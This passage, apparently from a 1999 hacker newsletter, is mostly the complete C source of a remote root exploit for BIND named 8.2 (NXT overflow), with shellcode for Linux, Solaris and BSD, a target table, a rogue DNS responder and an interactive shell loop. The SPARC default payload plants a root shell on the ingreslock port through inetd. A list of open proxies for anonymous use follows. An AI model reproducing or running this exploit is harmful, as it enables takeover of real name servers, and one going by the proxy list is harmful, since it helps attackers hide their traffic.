#include <stdlib.h>
#include <signal.h>
#include <time.h>
#include <string.h>
#include <ctype.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>
#include <netdb.h>
char linuxcode[]=
{0xe9,0xac,0x1,0x0,0x0,0x5e,0x89,0x76,0xc,0x8d,0x46,0x8,0x89,0x46,0x10,0x8d,
0x46,0x2e,0x89,0x46,0x14,0x56,0xeb,0x54,0x5e,0x89,0xf3,0xb9,0x0,0x0,0x0,0x0,
0xba,0x0,0x0,0x0,0x0,0xb8,0x5,0x0,0x0,0x0,0xcd,0x80,0x50,0x8d,0x5e,0x2,0xb9,
0xff,0x1,0x0,0x0,0xb8,0x27,0x0,0x0,0x0,0xcd,0x80,0x8d,0x5e,0x2,0xb8,0x3d,0x0,
0x0,0x0,0xcd,0x80,0x5b,0x53,0xb8,0x85,0x0,0x0,0x0,0xcd,0x80,0x5b,0xb8,0x6,
0x0,0x0,0x0,0xcd,0x80,0x8d,0x5e,0xb,0xb8,0xc,0x0,0x0,0x0,0xcd,0x80,0x89,0xf3,
0xb8,0x3d,0x0,0x0,0x0,0xcd,0x80,0xeb,0x2c,0xe8,0xa7,0xff,0xff,0xff,0x2e,0x0,
0x41,0x44,0x4d,0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,
0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,
0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x0,0x5e,0xb8,0x2,0x0,0x0,0x0,0xcd,0x80,0x89,
0xc0,0x85,0xc0,0xf,0x85,0x8e,0x0,0x0,0x0,0x89,0xf3,0x8d,0x4e,0xc,0x8d,0x56,
0x18,0xb8,0xb,0x0,0x0,0x0,0xcd,0x80,0xb8,0x1,0x0,0x0,0x0,0xcd,0x80,0xe8,0x75,
0x0,0x0,0x0,0x10,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x74,0x68,0x69,0x73,0x69,0x73,
0x73,0x6f,0x6d,0x65,0x74,0x65,0x6d,0x70,0x73,0x70,0x61,0x63,0x65,0x66,0x6f,
0x72,0x74,0x68,0x65,0x73,0x6f,0x63,0x6b,0x69,0x6e,0x61,0x64,0x64,0x72,0x69,
0x6e,0x79,0x65,0x61,0x68,0x79,0x65,0x61,0x68,0x69,0x6b,0x6e,0x6f,0x77,0x74,
0x68,0x69,0x73,0x69,0x73,0x6c,0x61,0x6d,0x65,0x62,0x75,0x74,0x61,0x6e,0x79,
0x77,0x61,0x79,0x77,0x68,0x6f,0x63,0x61,0x72,0x65,0x73,0x68,0x6f,0x72,0x69,
0x7a,0x6f,0x6e,0x67,0x6f,0x74,0x69,0x74,0x77,0x6f,0x72,0x6b,0x69,0x6e,0x67,
0x73,0x6f,0x61,0x6c,0x6c,0x69,0x73,0x63,0x6f,0x6f,0x6c,0xeb,0x86,0x5e,0x56,
0x8d,0x46,0x8,0x50,0x8b,0x46,0x4,0x50,0xff,0x46,0x4,0x89,0xe1,0xbb,0x7,0x0,
0x0,0x0,0xb8,0x66,0x0,0x0,0x0,0xcd,0x80,0x83,0xc4,0xc,0x89,0xc0,0x85,0xc0,
0x75,0xda,0x66,0x83,0x7e,0x8,0x2,0x75,0xd3,0x8b,0x56,0x4,0x4a,0x52,0x89,0xd3,
0xb9,0x0,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x80,0x5a,0x52,0x89,0xd3,
0xb9,0x1,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x80,0x5a,0x52,0x89,0xd3,
0xb9,0x2,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x80,0xeb,0x12,0x5e,0x46,
0x46,0x46,0x46,0x46,0xc7,0x46,0x10,0x0,0x0,0x0,0x0,0xe9,0xfe,0xfe,0xff,0xff,
0xe8,0xe9,0xff,0xff,0xff,0xe8,0x4f,0xfe,0xff,0xff,0x2f,0x62,0x69,0x6e,0x2f,
0x73,0x68,0x0,0x2d,0x63,0x0,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,
0xff,0xff,0xff,0xff,0x0,0x0,0x0,0x0,0x70,0x6c,0x61,0x67,0x75,0x65,0x7a,0x5b,
0x41,0x44,0x4d,0x5d,0x31,0x30,0x2f,0x39,0x39,0x2d};
char sc[]=
{0x40,0x0,0x0,0x2e,0x1,0x0,0x0,0x0,0x90,0x3,0xe0,0xd5,0x92,0x10,0x20,0x0,
0x82,0x10,0x20,0x5,0x91,0xd0,0x20,0x0,0xa0,0x10,0x0,0x8,0x90,0x3,0xe0,0xcc,
0x92,0x10,0x21,0xff,0x82,0x10,0x20,0x50,0x91,0xd0,0x20,0x0,0x90,0x3,0xe0,
0xcc,0x82,0x10,0x20,0x3d,0x91,0xd0,0x20,0x0,0x90,0x10,0x0,0x10,0x82,0x10,
0x20,0x78,0x91,0xd0,0x20,0x0,0x90,0x10,0x0,0x10,0x82,0x10,0x20,0x6,0x91,0xd0,
0x20,0x0,0x90,0x3,0xe0,0xd7,0x82,0x10,0x20,0xc,0x91,0xd0,0x20,0x0,0x90,0x3,
0xe0,0xd5,0x82,0x10,0x20,0x3d,0x91,0xd0,0x20,0x0,0xa0,0x10,0x20,0x0,0x90,
0x10,0x0,0x10,0x82,0x10,0x20,0x6,0x91,0xd0,0x20,0x0,0xa0,0x4,0x20,0x1,0x80,
0xa4,0x20,0x1e,0x4,0xbf,0xff,0xfb,0x1,0x0,0x0,0x0,0x90,0x3,0xe0,0xc0,0xa0,
0x3,0xe0,0xc5,0xe0,0x23,0xbf,0xf0,0xa0,0x3,0xe0,0xc9,0xe0,0x23,0xbf,0xf4,
0xa0,0x3,0xe1,0x5,0xe0,0x23,0xbf,0xf8,0xc0,0x23,0xbf,0xfc,0x92,0x3,0xbf,0xf0,
0x94,0x3,0xbf,0xfc,0x82,0x10,0x20,0x3b,0x91,0xd0,0x20,0x0,0x81,0xc3,0xe0,0x8,
0x1,0x0,0x0,0x0,0x2f,0x62,0x69,0x6e,0x2f,0x6b,0x73,0x68,0x0,0x2d,0x63,0x0,
0x41,0x44,0x4d,0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x0,0x2e,0x2e,0x2f,0x2e,
0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,
0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x0,0x68,0x6f,0x72,0x69,0x7a,0x6f,
0x6e,0x5b,0x41,0x44,0x4d,0x5d,0x31,0x30,0x2f,0x39,0x39,0x0};
char bsdcode[]=
{0xe9,0xd4,0x1,0x0,0x0,0x5e,0x31,0xc0,0x50,0x50,0xb0,0x17,0xcd,0x80,0x31,0xc0,
0x50,0x50,0x56,0x50,0xb0,0x5,0xcd,0x80,0x89,0x46,0x28,0xb9,0xff,0x1,0x0,0x0,
0x51,0x8d,0x46,0x2,0x50,0x50,0xb8,0x88,0x0,0x0,0x0,0xcd,0x80,0x8d,0x46,0x2,
0x50,0x50,0xb8,0x3d,0x0,0x0,0x0,0xcd,0x80,0x8b,0x46,0x28,0x50,0x50,0xb8,0xa7,
0x0,0x0,0x0,0x34,0xaa,0xcd,0x80,0x8d,0x46,0xb,0x50,0x50,0xb8,0xa6,0x0,0x0,
0x0,0x34,0xaa,0xcd,0x80,0x8d,0x46,0x21,0x48,0x50,0x50,0xb8,0x3d,0x0,0x0,0x0,
0xcd,0x80,0x50,0xb8,0x2,0x0,0x0,0x0,0xcd,0x80,0x85,0xc0,0xf,0x85,0xe6,0x0,
0x0,0x0,0x8d,0x56,0x38,0x89,0x56,0x28,0x8d,0x46,0x40,0x89,0x46,0x2c,0x8d,
0x46,0x43,0x89,0x46,0x30,0x8d,0x46,0x30,0x50,0x8d,0x46,0x28,0x50,0x52,0x50,
0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0x50,0x50,0xb8,0x1,0x0,0x0,0x0,0xcd,0x80,
0xe8,0xbc,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x62,0x6c,0x61,0x68,
0x62,0x6c,0x61,0x68,0x73,0x61,0x6d,0x65,0x74,0x68,0x69,0x6e,0x67,0x79,0x65,
0x74,0x61,0x6e,0x6f,0x74,0x68,0x65,0x72,0x73,0x70,0x61,0x63,0x65,0x66,0x6f,
0x72,0x61,0x73,0x6f,0x63,0x6b,0x61,0x64,0x64,0x72,0x73,0x74,0x72,0x75,0x63,
0x74,0x75,0x72,0x65,0x62,0x75,0x74,0x74,0x68,0x69,0x73,0x74,0x69,0x6d,0x65,
0x66,0x6f,0x72,0x74,0x68,0x65,0x62,0x73,0x64,0x73,0x68,0x65,0x6c,0x6c,0x63,
0x6f,0x64,0x65,0x66,0x6f,0x72,0x74,0x75,0x6e,0x61,0x74,0x6c,0x79,0x74,0x68,
0x69,0x73,0x77,0x69,0x6c,0x6c,0x77,0x6f,0x72,0x6b,0x69,0x68,0x6f,0x70,0x65,
0x6f,0x6b,0x69,0x74,0x68,0x69,0x6e,0x6b,0x65,0x6e,0x6f,0x75,0x67,0x68,0x73,
0x70,0x61,0x63,0x65,0x6e,0x6f,0x77,0x0,0x70,0x6c,0x61,0x67,0x75,0x65,0x7a,
0x5b,0x41,0x44,0x4d,0x5d,0x20,0x42,0x53,0x44,0x20,0x63,0x72,0x61,0x70,0x70,
0x79,0x20,0x73,0x68,0x65,0x6c,0x6c,0x63,0x6f,0x64,0x65,0x20,0x2d,0x20,0x31,
0x30,0x2f,0x39,0x39,0x31,0xd2,0xe9,0x3f,0xff,0xff,0xff,0x8d,0x46,0x4,0x50,
0x8d,0x46,0x8,0x50,0x52,0x52,0xb8,0x1f,0x0,0x0,0x0,0xcd,0x80,0x5a,0x83,0xf8,
0x0,0x75,0x6,0x80,0x7e,0x9,0x2,0x74,0xc,0x52,0x52,0xb8,0x6,0x0,0x0,0x0,0xcd,
0x80,0x42,0xeb,0xd7,0x6a,0x0,0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0x6a,
0x1,0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0x6a,0x2,0x52,0x52,0xb8,0x5a,
0x0,0x0,0x0,0xcd,0x80,0xeb,0x29,0x5e,0x46,0x46,0x46,0x46,0x46,0x8d,0x56,0x38,
0x89,0x56,0x28,0xc7,0x46,0x2c,0x0,0x0,0x0,0x0,0x8d,0x46,0x34,0x50,0x8d,0x46,
0x28,0x50,0x52,0x52,0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0xe9,0xc1,0xfe,0xff,0xff,
0xe8,0xd2,0xff,0xff,0xff,0xe8,0x27,0xfe,0xff,0xff,0x2e,0x0,0x41,0x44,0x4d,
0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,
0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,
0x0,0x2e,0x2f,0x0,0x0,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,
0xff,0x0,0x0,0x0,0x0,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x0,0x2d,0x63,0x0,
0x74,0x6f,0x75,0x63,0x68,0x20,0x2f,0x74,0x6d,0x70,0x2f,0x59,0x4f,0x59,0x4f,
0x59,0x4f,0x0};
char bsdnochroot[]=
{0xe9,0x79,0x1,0x0,0x0,0x5e,0x50,0xb8,0x2,0x0,0x0,0x0,0xcd,0x80,0x85,0xc0,0xf,
0x85,0xe6,0x0,0x0,0x0,0x8d,0x56,0x38,0x89,0x56,0x28,0x8d,0x46,0x40,0x89,0x46,
0x2c,0x8d,0x46,0x43,0x89,0x46,0x30,0x8d,0x46,0x30,0x50,0x8d,0x46,0x28,0x50,
0x52,0x50,0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0x50,0x50,0xb8,0x1,0x0,0x0,0x0,
0xcd,0x80,0xe8,0xbc,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xff,0x0,0x0,0x0,0x62,0x6c,
0x61,0x68,0x62,0x6c,0x61,0x68,0x73,0x61,0x6d,0x65,0x74,0x68,0x69,0x6e,0x67,
0x79,0x65,0x74,0x61,0x6e,0x6f,0x74,0x68,0x65,0x72,0x73,0x70,0x61,0x63,0x65,
0x66,0x6f,0x72,0x61,0x73,0x6f,0x63,0x6b,0x61,0x64,0x64,0x72,0x73,0x74,0x72,
0x75,0x63,0x74,0x75,0x72,0x65,0x62,0x75,0x74,0x74,0x68,0x69,0x73,0x74,0x69,
0x6d,0x65,0x66,0x6f,0x72,0x74,0x68,0x65,0x62,0x73,0x64,0x73,0x68,0x65,0x6c,
0x6c,0x63,0x6f,0x64,0x65,0x66,0x6f,0x72,0x74,0x75,0x6e,0x61,0x74,0x6c,0x79,
0x74,0x68,0x69,0x73,0x77,0x69,0x6c,0x6c,0x77,0x6f,0x72,0x6b,0x69,0x68,0x6f,
0x70,0x65,0x6f,0x6b,0x69,0x74,0x68,0x69,0x6e,0x6b,0x65,0x6e,0x6f,0x75,0x67,
0x68,0x73,0x70,0x61,0x63,0x65,0x6e,0x6f,0x77,0x0,0x70,0x6c,0x61,0x67,0x75,
0x65,0x7a,0x5b,0x41,0x44,0x4d,0x5d,0x20,0x42,0x53,0x44,0x20,0x63,0x72,0x61,
0x70,0x70,0x79,0x20,0x73,0x68,0x65,0x6c,0x6c,0x63,0x6f,0x64,0x65,0x20,0x2d,
0x20,0x31,0x30,0x2f,0x39,0x39,0x31,0xd2,0xe9,0x3f,0xff,0xff,0xff,0x5e,0x8d,
0x46,0x4,0x50,0x8d,0x46,0x8,0x50,0x52,0x52,0xb8,0x1f,0x0,0x0,0x0,0xcd,0x80,
0x5a,0x83,0xf8,0x0,0x75,0x6,0x80,0x7e,0x9,0x2,0x74,0xc,0x52,0x52,0xb8,0x6,
0x0,0x0,0x0,0xcd,0x80,0x42,0xeb,0xd7,0x6a,0x0,0x52,0x52,0xb8,0x5a,0x0,0x0,
0x0,0xcd,0x80,0x6a,0x1,0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0x6a,0x2,
0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0xeb,0x29,0x5e,0x46,0x46,0x46,0x46,
0x46,0x8d,0x56,0x38,0x89,0x56,0x28,0xc7,0x46,0x2c,0x0,0x0,0x0,0x0,0x8d,0x46,
0x34,0x50,0x8d,0x46,0x28,0x50,0x52,0x52,0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0xe9,
0xc0,0xfe,0xff,0xff,0xe8,0xd2,0xff,0xff,0xff,0xe8,0x82,0xfe,0xff,0xff,0x2e,
0x0,0x41,0x44,0x4d,0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x2e,0x2f,0x2e,0x2e,
0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,
0x2f,0x2e,0x2e,0x2f,0x0,0x2e,0x2f,0x0,0x0,0xff,0xff,0xff,0xff,0xff,0xff,0xff,
0xff,0xff,0xff,0xff,0xff,0x0,0x0,0x0,0x0,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,
0x0,0x2d,0x63,0x0,0x74,0x6f,0x75,0x63,0x68,0x20,0x2f,0x74,0x6d,0x70,0x2f,
0x59,0x4f,0x59,0x4f,0x59,0x4f,0x0};
struct arch
{
int id;
char *name;
char *code;
int codesize;
unsigned long safe;
unsigned long ret;
int length;
};
struct arch archlist[] =
{
{1, "Linux Redhat 6.x - named 8.2/8.2.1 (from rpm)", linuxcode,
sizeof(linuxcode), 0, 0xbfffd6c3, 6500},
{2, "Linux SolarDiz's non-exec stack patch - named 8.2/8.2.1",linuxcode,
sizeof(linuxcode), 0, 0x80f79ae, 6500},
{3, "Solaris 7 (0xff) - named 8.2.1", sc, sizeof(sc), 0xffbea738,
0xffbedbd0, 11000},
{4, "Solaris 2.6 - named 8.2.1", sc, sizeof(sc), 0xefffa000,
0xefffe5d0, 11000},
{5, "FreeBSD 3.2-RELEASE - named 8.2", bsdcode, sizeof(bsdcode), 1,
0xbfbfbdb8, 7000},
{6, "OpenBSD 2.5 - named 8.2", bsdcode, sizeof(bsdcode), 1,
0xefbfbb00, 7000},
{7, "NetBSD 1.4.1 - named 8.2.1", bsdnochroot, sizeof(bsdnochroot), 1,
0xefbfbb00, 7000},
{0, 0, 0, 0}
};
int arch=0;
char *command=0;
/* these two dns routines from dspoof/jizz */
/* pull out a compressed query name */
char *dnssprintflabel(char *s, char *buf, char *p)
{
unsigned short i,len;
char *b=NULL;
len=(unsigned short)*(p++);
while (len) {
while (len >= 0xC0) {
if (!b)
b=p+1;
p=buf+(ntohs(*((unsigned short *)(p-1))) & ~0xC000);
len=(unsigned short)*(p++);
}
for (i=0;i<len;i++)
*(s++)=*(p++);
*(s++)='.';
len=(unsigned short)*(p++);
}
*(s++)=0;
if (b)
return(b);
return(p);
}
/* store a query name */
char *dnsaddlabel(char *p, char *label)
{
char *p1;
while ((*label) && (label)) {
if ((*label == '.') && (!*(label+1)))
break;
p1=strchr(label,'.');
if (!p1)
p1=strchr(label,0);
*(p++)=p1-label;
memcpy(p,label,p1-label);
p+=p1-label;
label=p1;
if (*p1)
label++;
}
*(p++)=0;
return(p);
}
void make_overflow(char *a)
{
int i;
unsigned long *b;
unsigned char *c;
char sbuf[4096];
if (archlist[arch].safe==0) /* linux */
{
memset(a,0x90,4134);
memcpy(a+3500,archlist[arch].code,archlist[arch].codesize);
if (command)
strcpy(a+3500+archlist[arch].codesize, command);
else
strcpy(a+3500+archlist[arch].codesize, "exit");
b=(unsigned long*)(a+4134);
for (i=0;i<20;i++)
*b++=archlist[arch].ret;
}
else if (archlist[arch].safe==1) /* bsd */
{
memset(a,0x90,4134);
memcpy(a+3300,archlist[arch].code,archlist[arch].codesize);
if (command)
strcpy(a+3300+archlist[arch].codesize, command);
else
strcpy(a+3300+archlist[arch].codesize, "exit");
b=(unsigned long*)(a+4134);
for (i=0;i<20;i++)
*b++=archlist[arch].ret;
}
else /*SPARC*/
{
memset(a,0x0,11000);
b=(unsigned long*)(a+4438);
for (i=0;i<1500;i++)
*b++=htonl(0xac15a16e);
c=(char *)b;
for (i=0;i<archlist[arch].codesize;i++)
*c++=archlist[arch].code[i];
if (command)
strcpy(c, command);
else
strcpy(c, "echo \"ingreslock stream tcp nowait root /bin/sh sh -i\" \
>>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob;/bin/rm -f /tmp/bob ");
b=(unsigned long*)(a+4166);
*b++=htonl(0xdeadbeef);
*b++=htonl(0xdeadbeef);
*b++=htonl(archlist[arch].safe); //i2 - significant
*b++=htonl(0xdeadbeef);
*b++=htonl(0xdeadbeef);
*b++=htonl(archlist[arch].safe); //i5 - significant
*b++=htonl(0xdeadbeef);
*b++=htonl(0xdeadbeef);
*b++=htonl(archlist[arch].safe); //o0 - significant
*b++=htonl(0xdeadbeef);
*b++=htonl(archlist[arch].safe); //o2 - significant
*b++=htonl(0xdeadbeef);
*b++=htonl(0xdeadbeef);
*b++=htonl(0xdeadbeef);
*b++=htonl(archlist[arch].safe); //o6 - significant
*b++=htonl(archlist[arch].ret); //o7 - retaddr
}
}
int form_response(HEADER *packet, char *buf)
{
char query[512];
int qtype;
HEADER *dnsh;
char *p;
char *walker;
memset(buf,0,sizeof(buf));
dnsh = (HEADER *) buf;
dnsh->id = packet->id;
dnsh->qr=1;
dnsh->aa=1;
dnsh->qdcount = htons(1);
dnsh->ancount = htons(1);
dnsh->arcount = htons(1);
dnsh->rcode = 0;
walker=(char*)(dnsh+1);
p=dnssprintflabel(query, (char *)packet, (char*)(packet+1));
query[strlen(query) - 1] = 0;
qtype=*((unsigned short *)p);
printf("%s type=%d\n",query, ntohs(qtype));
/* first, the query */
walker=dnsaddlabel(walker, query);
PUTSHORT(ntohs(qtype), walker);
//PUTSHORT(htons(T_PTR), walker);
PUTSHORT(1,walker);
/* then, our answer */
/* query IN A 1.2.3.4 */
walker=dnsaddlabel(walker, query);
PUTSHORT(T_A, walker);
PUTSHORT(1, walker);
PUTLONG(60*5, walker);
PUTSHORT(4, walker);
sprintf(walker,"%c%c%c%c",1,2,3,4);
walker+=4;
/* finally, we make named do something more interesting */
walker=dnsaddlabel(walker, query);
PUTSHORT(T_NXT, walker);
PUTSHORT(1, walker);
PUTLONG(60*5, walker);
/* the length of one label and our arbitrary data */
PUTSHORT(archlist[arch].length+7, walker);
PUTSHORT(6, walker);
sprintf(walker,"admadm");
walker+=6;
PUTSHORT(0, walker);
make_overflow(walker);
walker+=archlist[arch].length;
PUTSHORT(0, walker);
return walker-buf;
}
#define max(x,y) ((x)>(y)?(x):(y))
int proxyloop(int s)
{
char snd[1024], rcv[1024];
fd_set rset;
int maxfd, n;
sleep(1);
printf("Entering proxyloop..\n");
strcpy(snd, "cd /; uname -a; pwd; id;\n");
write(s, snd, strlen(snd));
for (;;)
{
FD_SET(fileno(stdin), &rset);
FD_SET(s, &rset);
maxfd = max(fileno(stdin), s) + 1;
select(maxfd, &rset, NULL, NULL, NULL);
if (FD_ISSET(fileno(stdin), &rset))
{
bzero(snd, sizeof(snd));
fgets(snd, sizeof(snd) - 2, stdin);
write(s, snd, strlen(snd));
}
if (FD_ISSET(s, &rset))
{
bzero(rcv, sizeof(rcv));
if ((n = read(s, rcv, sizeof(rcv))) == 0)
exit(0);
if (n < 0)
{
return -3;
}
fputs(rcv, stdout);
}
}
return 0;
}
int main(int argc, char **argv)
{
int s, fromlen, res, sl, s2;
struct sockaddr_in sa, from, to;
char buf[16384];
char sendbuf[16384];
unsigned short ts;
int i;
if (argc<2)
{
fprintf(stderr,"Usage: %s architecture [command]\n", argv[0]);
fprintf(stderr,"Available architectures:\n");
i=-1;
while(archlist[++i].id)
fprintf(stderr," %d: %s\n",archlist[i].id,archlist[i].name);
exit(1);
}
arch=atoi(argv[1])-1;
if (argc==3)
command=argv[2];
if ((s=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))==-1)
{
perror("socket");
exit(1);
}
bzero(&sa, sizeof sa);
sa.sin_family=AF_INET;
sa.sin_addr.s_addr=INADDR_ANY;
sa.sin_port=htons(53);
if (bind(s, (struct sockaddr *)&sa, sizeof(sa))==-1)
{
perror("bind");
exit(1);
}
do
{
fromlen=sizeof(from);
if ((res=recvfrom(s, buf, sizeof buf, 0, (struct sockaddr *)&from,
&fromlen)) == -1)
{
perror("recvfrom");
exit(1);
}
printf("Received request from %s:%d for ", inet_ntoa(from.sin_addr),
ntohs(from.sin_port));
sl=form_response((HEADER *)buf,sendbuf);
/* now lets connect to the nameserver */
bzero(&to, sizeof(to));
to.sin_family=AF_INET;
to.sin_addr=from.sin_addr;
to.sin_port=htons(53);
if ((s2=socket(AF_INET, SOCK_STREAM, 0))==-1)
{
perror("socket");
exit(1);
}
if (connect(s2, (struct sockaddr *)&to, sizeof to)==-1)
{
perror("connect");
exit(1);
}
ts=htons(sl);
write(s2,&ts,2);
write(s2,sendbuf,sl);
if (archlist[arch].safe>1)
close(s2);
} while (archlist[arch].safe>1); /* infinite loop for sparc */
proxyloop(s2);
exit(1);
}
@HWA
54.0 Current snapshot of the CYBERARMY lists. Proxies, etc
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Check these lists and see if YOUR box is listed here as it can be abused by
malicious crackers and net miscreants to wreak havoc and spam networks. - Ed
[ Proxies: ]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
proxy1.emirates.net.ae port 8080 [latency: 11/17/99 16:27:53 EST by coolio]
i.am.31337.nu port 31337 [latency: 11/17/99 12:29:57 EST by Elite.]
138.25.8.1 port 80 [latency: 11/16/99 00:30:03 EST by ThA LasT Don]
138.25.8.9 port 80 [latency: 11/16/99 00:29:31 EST by ThA LasT Don]
proxy.elender.hu port 3128 [latency: 11/15/99 10:23:10 EST]
proxy.prodigy.net port 8080 [latency: 11/14/99 20:31:02 EST by ladeda]
212.119.32.2 port 1080 [latency: 11/14/99 13:33:09 EST by GooD_LooKing_Boy]
151.198.20.153 port 1080 [latency: 11/14/99 13:30:53 EST by GooD_LooKing_Boy]
151.198.24.19 port 3128 [latency: 11/14/99 09:22:25 EST by ALiEN]
205.151.225.202 port 80 [latency: 11/14/99 02:10:41 EST by scYthe]
tntport0945.cwjamaica.com port 21 [latency: 11/13/99 20:17:23 EST]
proxy.shabakah.net.sa port 80 [latency: 11/13/99 11:05:49 EST by shabak]
proxy.sol.net.sa port 8080 [latency: 11/13/99 08:02:26 EST by aaa]
inet.com.pk port 8080 [latency: 11/12/99 15:10:11 EST by zahid]
sinkross.san.ru port 80 [latency: 11/12/99 13:47:34 EST by T_Rex]
202.54.6.20 port 3318 [latency: 11/12/99 12:42:12 EST by gauri_ps]
proxy.gocis.bg (195.138.133.18) port 3128 [latency: 11/12/99 12:09:32 EST by Tribal]
proxy.gocis.bg (195.138.133.18) port 3128 [latency: 11/12/99 12:06:25 EST by Tribal]
proxy.dade.k12.fl.us port 80 [latency: 11/12/99 10:26:37 EST]
204.81.0.20 port 80 [latency: 11/12/99 10:06:47 EST]
151.198.24.19 port 3128 [latency: 11/12/99 07:12:47 EST]
151.198.19.116 port 1080 [latency: 11/12/99 07:10:53 EST]
151.198.18.245 port 80 [latency: 11/12/99 07:10:07 EST by T_Rex]
proxy.pacific.net.sg port 8080 [latency: 11/12/99 02:54:15 EST]
205.237.52.61 port 80 [latency: 11/11/99 23:13:48 EST by T_Rex]
195.98.37.11 port 1080 [latency: 11/11/99 23:04:52 EST by T_Rex]
ww-pa01.proxy.aol.com port 80 [latency: 11/11/99 21:15:33 EST]
server.goway.com port 1080 [latency: 11/11/99 19:06:47 EST by fusion]
cache.btinternet.com port 8080 [latency: 11/11/99 15:44:11 EST by DiGiTaL DeMoN]
proxy1.brunet.bn port 8080 [latency: 11/11/99 13:23:30 EST by VivrÄnt HÄcker]
210.154.98.61 port 1080 [latency: 11/11/99 05:42:18 EST]
emirates.net.ae port 8080 [latency: 11/11/99 02:43:27 EST by slayer]
prx7.vic.schools.net.au port 3128 [latency: 11/10/99 23:13:56 EST by Xpy]
proxy.kyit.edu.tw port 3128 [latency: 11/10/99 21:24:04 EST]
fuckyou.com port 3169 [latency: 11/10/99 20:24:34 EST]
spaceproxy.com port 80 [latency: 11/10/99 20:04:59 EST]
proxy.dmp.net.sa port 8080 [latency: 11/10/99 18:14:30 EST]
hotmail.com port 80 [latency: 11/10/99 18:10:25 EST]
24.4.29.247 port 1080 [latency: 11/10/99 14:45:46 EST]
1Cust92.tnt2.eugene.or.da.uu.net port 7000 [latency: 11/10/99 10:01:42 EST]
proxy.icc.net.sa port 8080 [latency: 11/10/99 09:59:58 EST by xodiac]
proxy.prodigy.net port 8080 [latency: 11/10/99 05:57:39 EST]
205.151.225.201 port 80 [latency: 11/09/99 22:22:06 EST by ThA LasT Don]
205.151.225.202 port 80 [latency: 11/09/99 22:21:48 EST by ThA LasT Don]
207.34.202.2 port 80 [latency: 11/09/99 22:20:07 EST by ThA LasT Don]
proxy.prodigy.net port 8080 [latency: 11/09/99 21:27:49 EST]
proxy.marin.k12.ca.us port 80 [latency: 11/09/99 18:28:48 EST by Nuno Ricardo]
server.goway.com port 1080 [latency: 11/09/99 16:06:35 EST by BM-Freak]
202.21.14.234 port 1080,80 [latency: 11/09/99 15:22:08 EST by T_Rex]
proxy.easynet.co.uk port 3128 [latency: 11/08/99 21:56:37 EST by uanyong]
proxy.easynet.co.uk port 3128 [latency: 11/08/99 17:18:41 EST]
proxy1.emirates.net.ae port 8080 [latency: 11/08/99 17:17:26 EST by farrukh]
gw1.ksu.edu.sa port 80 [latency: 11/08/99 02:23:41 EST]
proxy.cat.net.th port 8080 [latency: 11/08/99 01:10:06 EST by KrypticF-]
proxy.spnet.net port 3428 [latency: 11/08/99 01:07:57 EST by RadaR]
hotmail.com port 80 [latency: 11/08/99 00:59:41 EST by ttt]
proxy.tiscalinet.it port 3128 [latency: 11/07/99 21:04:30 EST by Giacomo Giorgi]
205.188.160.121 port AOL [latency: 11/07/99 18:49:30 EST by Xmenddddd]
sabelaout.saix.net port 8080 [latency: 11/07/99 17:04:04 EST by Chawwa]
24.4.29.247 port 1080 [latency: 11/07/99 15:51:50 EST]
sabelaout.saix.net port 8080 [latency: 11/07/99 13:52:17 EST]
194.143.243.244 port 35727 [latency: 11/07/99 12:41:52 EST]
proxy1.ae.net.sa port 8080 [latency: 11/07/99 11:35:49 EST by man]
proxy.vtx.ch port 8080 [latency: 11/07/99 11:20:05 EST by bastard]
212.26.19.169 port 8080 [latency: 11/07/99 06:23:22 EST by namer]
1Cust92.tnt2.eugene.or.da.uu.net port 7000 [latency: 11/06/99 16:03:53 EST by ircproxy]
dinmamma.com port 8080 [latency: 11/06/99 14:42:29 EST]
proxy.cadvision.com port 8080 [latency: 11/06/99 13:18:08 EST by Wingaman]
205.151.225.202 port 80 [latency: 11/06/99 10:03:05 EST by ThA LasT Don]
proxy.xmission.com port 8080 [latency: 11/06/99 04:24:21 EST by #r00t/sh4d0w]
